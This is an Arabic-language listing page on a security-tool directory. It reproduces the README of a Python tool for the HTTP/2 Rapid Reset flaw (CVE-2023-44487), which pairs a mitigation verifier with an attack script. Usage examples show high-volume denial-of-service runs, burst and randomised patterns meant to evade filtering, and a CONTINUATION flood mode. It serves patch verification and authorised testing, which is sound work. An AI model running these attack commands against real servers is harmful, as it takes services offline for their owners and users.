Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/madhusudhan-in/cve_2023_44487-rapid_reset
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبأمن الشبكاتاختبار الاختراق
GitHubmadhusudhan-in/cve_2023_44487-rapid_reset

CVE_2023_44487-Rapid_Reset

أداة اختبار شاملة بلغة Python لثغرة CVE-2023-44487، وهي ثغرة HTTP/2 Rapid Reset. توفر هذه النسخة المحسّنة تحكماً دقيقاً في معاملات الاختبار، وأنماط هجوم متعددة، وقدرات مراقبة متقدمة.

عرض المستودع
14منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة اختبار CVE-2023-44487 HTTP/2 Rapid Reset - الإصدار المحسّن

أداة اختبار شاملة مكتوبة بلغة Python لثغرة CVE-2023-44487، وهي ثغرة HTTP/2 Rapid Reset. يحتوي هذا المستودع على أدوات لاختبار الهجوم وأخرى تركز على التحقق.

⚠️ إخلاء مسؤولية مهم

هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط!

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الاستخدام غير المصرح به قد يكون غير قانوني وقد يتسبب في تعطيل الخدمة
  • تنفّذ الأدوات اختبارات هجوم قد تؤثر على توفر الخادم
  • تأكد دائمًا من الحصول على التصريح المناسب قبل إجراء أي اختبار

🔍 حول CVE-2023-44487

تُعرف CVE-2023-44487 أيضًا باسم "HTTP/2 Rapid Reset"، وهي ثغرة حرجة في بروتوكول HTTP/2 تتيح للمهاجمين:

  • التسبب في حجب الخدمة عبر إرسال وإلغاء تدفقات HTTP/2 بسرعة
  • استهلاك موارد خادم مفرطة باستخدام موارد عميل ضئيلة
  • تجاوز العديد من آليات تحديد المعدل التقليدية
  • التأثير على خوادم الويب الرئيسية وموازنات الأحمال

درجة CVSS: 7.5 (عالية)

الأثر: حجب الخدمة، استنزاف الموارد

📋 المتطلبات

  • Python 3.7 أو أحدث
  • مكتبة h2:
pip install h2

📖 التثبيت

  1. استنسخ المستودع أو نزّله:
root@kitploit:~
git clone https://github.com/madhusudhan-in/CVE_2023_44487-Rapid_Reset.git
cd CVE_2023_44487-Rapid_Reset
  1. ثبّت التبعيات:
root@kitploit:~
pip install h2
  1. اجعل البرامج النصية قابلة للتنفيذ:
root@kitploit:~
chmod +x *.py
  1. تحقق من إصدار Python:
root@kitploit:~
python3 --version  # Should be 3.7+

🛡️ أداة التحقق (محسّنة)

cve_2023_44487_verifier_enhanced.py

الغرض: اكتشاف إشارات الإنفاذ للتحقق بعد تطبيق التصحيح وفحص الامتثال

الميزات الرئيسية

  • 📡 التقاط إعدادات الخادم SETTINGS: يسجّل إطار SETTINGS الأولي للخادم في HTTP/2
  • 🛡️ تحليل إطارات GOAWAY: يلتقط جميع إطارات GOAWAY ويصنّفها مع رموز خطأ متوافقة مع RFC 9113
  • 📊 تتبع المعدل لكل ثانية: يراقب معدل إعادة التعيين لكل ثانية لاكتشاف أنماط التقييد التكيفي
  • 🔍 كشف إشارات الإنفاذ:
    • ✅ GOAWAY برمز ENHANCE_YOUR_CALM (0xb) — إنفاذ على طبقة البروتوكول
    • ✅ إعادة تعيين TCP على طبقة النقل — تدخل على مستوى الحافة
    • ✅ استجابات REFUSED_STREAM (0x7) — تحديد معدل على مستوى التدفق
    • ✅ أنماط التقييد التكيفي — كشف ذكي لتحديد المعدل
  • 📈 تصنيف إغلاق الاتصال: يحدد كيف ولماذا تُغلق الاتصالات
  • ⚡ اختبار الاتصالات المتزامنة: اختبار اتصالات HTTP/2 متعددة في وقت واحد
  • 🎯 نظام حكم ذكي: يصنّف حالة الثغرة بناءً على إشارات الإنفاذ الفعلية

البدء السريع

root@kitploit:~
# Basic verification
python3 cve_2023_44487_verifier_enhanced.py target.com

# Multiple concurrent connections
python3 cve_2023_44487_verifier_enhanced.py target.com -c 5 -s 500

# Verbose output with debugging
python3 cve_2023_44487_verifier_enhanced.py target.com -v -c 3 -s 1000

# Baseline test only (normal requests)
python3 cve_2023_44487_verifier_enhanced.py target.com --baseline-only

خيارات سطر الأوامر

الخيارالوصفالافتراضي
hostاسم المضيف الهدف (مطلوب)-
-p, --portالمنفذ الهدف443
--no-sslتعطيل SSL/TLSFalse (SSL مفعّل)
-s, --streamsعدد التدفقات لكل اتصال1000
-d, --delayالتأخير بين عمليات التدفق (بالثواني)0.001
-c, --connectionsعدد الاتصالات المتزامنة1
--baseline-onlyإجراء اختبار خط الأساس فقط (بدون هجوم)False
-v, --verboseمخرجات مفصّلة / تصحيح الأخطاءFalse

فهم الحكم

يقدّم البرنامج حكمًا ذكيًا استنادًا إلى إشارات إنفاذ متوافقة مع RFC 9113:

✅ تأكيد الإنفاذ

root@kitploit:~
Server sends GOAWAY with ENHANCE_YOUR_CALM (0xb) error code
Classification: NOT VULNERABLE — protocol-layer enforcement is active
Meaning: HTTP/2 implementation has proper rate-limiting controls

⚠️ اكتشاف تدخل على مستوى الحافة/طبقة النقل

root@kitploit:~
50%+ of connections terminated via TCP reset
Classification: LIKELY PROTECTED — verify with edge/infrastructure team
Meaning: Edge appliance or DDoS protection engaged at transport layer

⚠️ اكتشاف تقييد تكيفي

root@kitploit:~
Per-second reset rate drops significantly over time (late buckets <60% of early)
Classification: PARTIAL PROTECTION — confirm with infrastructure team
Meaning: Server or edge slowing the attack adaptively

⚠️ اكتشاف رفض التدفقات

root@kitploit:~
Server sends REFUSED_STREAM (0x7) responses
Classification: PARTIAL PROTECTION — review rate limits
Meaning: Some stream-level rate-limiting in place

❌ لم يُلاحظ أي إنفاذ على طبقة البروتوكول

root@kitploit:~
No ENHANCE_YOUR_CALM GOAWAY, no TCP resets, no throttling detected
Classification: VECTOR EXERCISABLE — exploitability unconfirmed
Important: This doesn't prove DoS exploitability. Edge volumetric/behavioral 
protections (Akamai, CloudFlare) may engage at higher scales

مثال على المخرجات

root@kitploit:~
============================================================
ENFORCEMENT SIGNAL ANALYSIS
============================================================
Server SETTINGS (initial frame):
  HEADER_TABLE_SIZE = 4096
  ENABLE_PUSH = True
  MAX_CONCURRENT_STREAMS = 128
  INITIAL_WINDOW_SIZE = 65535
  MAX_FRAME_SIZE = 16384
  → MAX_CONCURRENT_STREAMS=128 is conservative (good post-CVE default)

GOAWAY breakdown across connections:
  ENHANCE_YOUR_CALM (0xb): 3/5
  Other GOAWAY codes:      1/5
  No GOAWAY received:      1/5
  TCP reset (RST at transport): 0/5
  Total RST_STREAM frames from server: 2
  REFUSED_STREAM frames from server:   0
  Connections showing adaptive throttling: 1/5

============================================================
VERDICT
============================================================
✅ ENFORCEMENT CONFIRMED
   3/5 connection(s) received GOAWAY with ENHANCE_YOUR_CALM (0xb).
   This is the canonical signal that the CVE-2023-44487 mitigation is active.
   Classification: NOT VULNERABLE — protocol-layer enforcement is engaged.

أمثلة استخدام متقدمة

1. التحقق بعد تطبيق التصحيح

root@kitploit:~
# Verify patch deployment with 10 connections, 500 streams each
python3 cve_2023_44487_verifier_enhanced.py prod-api.example.com \
    -c 10 \
    -s 500 \
    -d 0.0001 \
    -v

2. منفذ وبروتوكول مخصصان

root@kitploit:~
# Test non-standard HTTPS port
python3 cve_2023_44487_verifier_enhanced.py example.com \
    -p 8443 \
    -c 5 \
    -s 1000

3. فحص امتثال البنية التحتية

root@kitploit:~
# Minimal load compliance test
python3 cve_2023_44487_verifier_enhanced.py example.com \
    -c 3 \
    -s 200 \
    --baseline-only

التفاصيل الفنية

إشارات إنفاذ HTTP/2

ENHANCE_YOUR_CALM (رمز الخطأ 0xb):

  • إشارة تحديد المعدل الأساسية في HTTP/2 (RFC 9113)
  • يستجيب الخادم لهجوم إعادة التعيين السريعة بإطار GOAWAY برمز 0xb
  • يشير إلى أن الدفاع على طبقة البروتوكول نشط
  • أفضل ممارسة للتخفيف بعد CVE-2023-44487

REFUSED_STREAM (رمز الخطأ 0x7):

  • يرفض الخادم فتح تدفقات جديدة
  • آلية بديلة لتحديد المعدل على مستوى التدفق
  • أقل شيوعًا لكنها تظل دفاعًا صالحًا

تحليل معدل إعادة التعيين لكل ثانية:

  • يصنّف عمليات إعادة تعيين التدفقات في نوافذ زمنية مدتها ثانية واحدة
  • يكتشف التقييد التكيفي: إذا كانت الفواصل الزمنية المتأخرة << الفواصل المبكرة، فالخادم يتكيف
  • يشير إلى تحديد معدل ذكي (وليس مجرد حدود صارمة)

إعادة تعيين TCP على طبقة النقل:

  • يُنهى الاتصال على طبقة TCP قبل إغلاق HTTP/2 السلس
  • يشير إلى تدخل جهاز حافة أو جدار حماية
  • ليس إنفاذًا على طبقة بروتوكول HTTP/2، لكنه فعّال

تصنيفات إغلاق الاتصال

سبب الإغلاقالمعنى
goaway_enhance_your_calmاستلام GOAWAY برمز 0xb (أفضل مؤشر على إصلاح الثغرة)
goaway_*GOAWAY مع رمز خطأ آخر
tcp_resetاستلام TCP RST (تدخل على مستوى الحافة)
broken_pipe / recv_errorخطأ في الاتصال أثناء التواصل
eof_no_goawayنهاية ملف (EOF) غير متوقعة بدون GOAWAY
no_close_no_enforcementبقي الاتصال مفتوحًا (لم يُكتشف أي إنفاذ)

أمثلة التكامل

الأتمتة عبر Python

root@kitploit:~
import asyncio
import subprocess

def run_verification(target: str, num_connections: int = 3):
    cmd = [
        'python3', 'cve_2023_44487_verifier_enhanced.py',
        target,
        '-c', str(num_connections),
        '-s', '500',
        '-v'
    ]
    
    result = subprocess.run(cmd, capture_output=True, text=True)
    
    # Parse verdict from output
    if "ENFORCEMENT CONFIRMED" in result.stdout:
        print(f"✅ {target} is protected")
        return "protected"
    elif "LIKELY PROTECTED" in result.stdout:
        print(f"⚠️  {target} has edge-level protection")
        return "edge_protected"
    else:
        print(f"❌ {target} shows no enforcement")
        return "vulnerable"

# Run test
status = run_verification("example.com", 5)

المراقبة المستمرة

root@kitploit:~
#!/bin/bash
# Monitor critical services weekly

TARGETS="api.example.com web.example.com cdn.example.com"
LOG_DIR="/var/log/cve-2023-44487"
mkdir -p "$LOG_DIR"

for target in $TARGETS; do
    python3 cve_2023_44487_verifier_enhanced.py "$target" \
        -c 3 \
        -s 500 \
        -v > "$LOG_DIR/$target-$(date +%Y%m%d).log" 2>&1
done

🚀 أداة اختبار الهجوم (إصدار سابق)

rapid_reset_test.py

الغرض: اختبار شامل لهجوم HTTP/2 Rapid Reset بأنماط متعددة

الميزات

  • ⚡ Rapid Reset: إطارات HEADERS قياسية + RST_STREAM فورية
  • 💥 Burst Reset: طلبات على شكل دفعات مع تأخيرات قابلة للتهيئة
  • 📈 Gradual Reset: زيادة معدل الهجوم تدريجيًا
  • 🎲 Random Reset: توقيت عشوائي لتجاوز التصفية التنبؤية
  • 🌊 Continuation Flood: هجوم فيضان بإطارات CONTINUATION
  • 🔀 Mixed Pattern: مزيج من أنماط متعددة

الاستخدام الأساسي

root@kitploit:~
python3 rapid_reset_test.py https://target-server.com

أمثلة استخدام متقدمة

اختبار الحمل عالي الإنتاجية

root@kitploit:~
python3 rapid_reset_test.py https://target.com \
    --connections 50 \
    --requests 1000 \
    --delay 0 \
    --pattern rapid_reset \
    --track-latency \
    --output json

اختبار خفي مع ترويسات مخصصة

root@kitploit:~
python3 rapid_reset_test.py https://target.com \
    --pattern burst_reset \
    --burst-size 5 \
    --burst-delay 2.0 \
    --custom-headers "User-Agent: Mozilla/5.0" \
    --jitter 0.3

اختبار خاص بالبروتوكول

root@kitploit:~
python3 rapid_reset_test.py https://target.com \
    --window-size 32768 \
    --frame-size 32768 \
    --header-table-size 8192 \
    --enable-push \
    --priority-frames \
    --randomize-streams

خيارات سطر الأوامر

إعدادات الاتصال

الخيارالوصفالافتراضي
-c, --connections Nعدد الاتصالات المتزامنة1
--connection-timeout SECمهلة الاتصال بالثواني10
--read-timeout SECمهلة قراءة الاستجابات5
--connection-delay SECالتأخير بين الاتصالات0.0

إعدادات الطلبات

الخيارالوصفالافتراضي
-r, --requests Nالطلبات لكل اتصال100
--delay SECالتأخير بين HEADERS وRST_STREAM0.001
--request-delay SECالتأخير بين الطلبات0.0
--jitter FACTORمعامل عشوائية التوقيت0.0

أنماط الهجوم

الخيارالوصفالافتراضي
--pattern TYPEنمط الهجوم الذي سيُستخدمrapid_reset
--burst-size Nالطلبات لكل دفعة10
--burst-delay SECالتأخير بين الدفعات0.1

الأنماط المتاحة:

  • rapid_reset - هجوم إعادة التعيين السريعة القياسي
  • burst_reset - هجمات قائمة على الدفعات
  • gradual_reset - معدل متزايد تدريجيًا
  • random_reset - توقيت عشوائي
  • continuation_flood - فيضان بإطارات CONTINUATION
  • mixed_pattern - مزيج من الأنماط

إعدادات بروتوكول HTTP/2

الخيارالوصفالافتراضي
--window-size BYTESحجم النافذة الأولي لـ HTTP/265535
--frame-size BYTESالحد الأقصى لحجم الإطار16384
--header-table-size BYTESحجم جدول ترويسات HPACK4096
--enable-pushتفعيل دفع الخادم في HTTP/2False
--rst-error-code CODEرمز خطأ RST_STREAM8

خيارات المخرجات

الخيارالوصفالافتراضي
--output FORMATصيغة المخرجاتconsole
--output-file FILEاسم ملف المخرجاتauto-generated
--verbose, -vمخرجات مفصّلةFalse
--debugتسجيل التصحيحFalse
--log-file FILEالتسجيل في ملفNone

صيغ المخرجات المتاحة:

  • console - مخرجات وحدة تحكم سهلة القراءة
  • json - JSON قابل للقراءة آليًا
  • csv - CSV متوافق مع جداول البيانات
  • xml - صيغة XML منظمة

تقييم المخاطر

تقيّم الأداة حالة الثغرة تلقائيًا:

  • 🔴 مخاطر عالية (نجاح >80%): الخادم معرّض للثغرة على الأرجح
  • 🟡 مخاطر متوسطة (نجاح 50-80%): ثغرة جزئية
  • 🟢 مخاطر منخفضة (نجاح <50%): يبدو أن إجراءات التخفيف فعّالة

🐛 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  1. الخطأ "No module named 'h2'"

    root@kitploit:~
    pip install h2
    
  2. رفض الاتصال / انتهاء المهلة

    • تحقق من أن الهدف يدعم HTTP/2: curl -I --http2 https://target.com
    • تحقق من قواعد جدار الحماية
    • تحقق من أن شهادة SSL/TLS صالحة
  3. خطأ ImportError مع وحدات h2

    root@kitploit:~
    pip install --upgrade h2
    python3 --version  # Must be 3.7+
    
  4. رفض الإذن

    root@kitploit:~
    chmod +x *.py
    python3 cve_2023_44487_verifier_enhanced.py target.com
    

خطوات التصحيح

  1. فعّل التسجيل المفصّل:

    root@kitploit:~
    python3 cve_2023_44487_verifier_enhanced.py target.com -v
    
  2. اختبر بمعاملات ضئيلة:

    root@kitploit:~
    python3 cve_2023_44487_verifier_enhanced.py target.com -s 10 -c 1
    
  3. تحقق من دعم HTTP/2:

    root@kitploit:~
    python3 -c "import h2; print('h2 library OK')"
    

📚 المراجع

  • تفاصيل CVE-2023-44487
  • RFC 9113 - مواصفات HTTP/2
  • قاعدة بيانات CVE في NIST
  • التحليل الفني من Cloudflare
  • مدونة أمان Google

⚖️ إشعار قانوني

هذا المستودع مخصص لمحترفي الأمن السيبراني والباحثين ومسؤولي الأنظمة لاختبار أنظمتهم الخاصة أو الأنظمة التي لديهم إذن صريح لاختبارها.

النقاط القانونية الأساسية:

  • اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها
  • الاختبار غير المصرح به قد ينتهك قوانين جرائم الكمبيوتر
  • يمكن لهذه الأدوات أن تسبب تعطيلًا فعليًا للخدمة
  • أبلغ دائمًا أصحاب المصلحة المعنيين قبل الاختبار
  • استخدمها خلال نوافذ الصيانة كلما أمكن
  • وثّق جميع أنشطة الاختبار لأغراض التدقيق
  • المؤلفون غير مسؤولين عن الاستخدام غير المصرح به

تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة. استخدم هذه الأدوات بأخلاقية وبشكل قانوني.


📄 الترخيص

هذه الأداة مقدمة بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.

🆕 ما الجديد

أداة التحقق المحسّنة

  • ✅ التقاط إعدادات الخادم SETTINGS: فحص معاملات HTTP/2 الدفاعية
  • ✅ تحليل إطارات GOAWAY: تصنيف رموز الأخطاء المتوافقة مع RFC 9113
  • ✅ كشف التقييد التكيفي: تحديد أنماط تحديد المعدل
  • ✅ نظام حكم ذكي: تصنيفات واضحة (إنفاذ مؤكد، حماية على الحافة، معرّض للثغرة، إلخ)
  • ✅ تصنيف إغلاق الاتصال: فهم كيف ولماذا تنتهي الاتصالات
  • ✅ اختبار الاتصالات المتزامنة: اختبارات متزامنة متعددة للوصول إلى نتائج موثوقة

دليل اختيار الأداة

حالة الاستخدامالأداةالسبب
التحقق بعد تطبيق التصحيحcve_2023_44487_verifier_enhanced.pyيكتشف إشارات الإنفاذ
فحص الامتثالcve_2023_44487_verifier_enhanced.pyيتحقق من تخفيف أثر الثغرة
تقييم البنية التحتيةcve_2023_44487_verifier_enhanced.pyأحكام واضحة وقابلة للتنفيذ
بحث الهجماتrapid_reset_test.pyأنماط هجوم متعددة
اختبار الأداءrapid_reset_test.pyمقاييس شاملة
أنماط مخصصةrapid_reset_test.pyإعدادات دقيقة
تنزيل الأداة